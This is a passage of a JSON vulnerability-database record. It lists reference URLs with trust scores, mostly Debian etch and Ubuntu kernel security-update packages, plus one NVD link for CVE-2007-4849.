        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-13etch3_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-486_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mipsel_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch3.diff.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.13etch3.dsc"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch3_ia64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.13etch3.diff.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.13etch3.tar.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-13etch3_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-k7_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-13etch3_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-486_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-prep_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-amd64_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-5_2.6.18.dfsg.1-13etch3_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-itanium_2.6.18.dfsg.1-13etch3_ia64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-k7_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4849"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.41_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.41.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
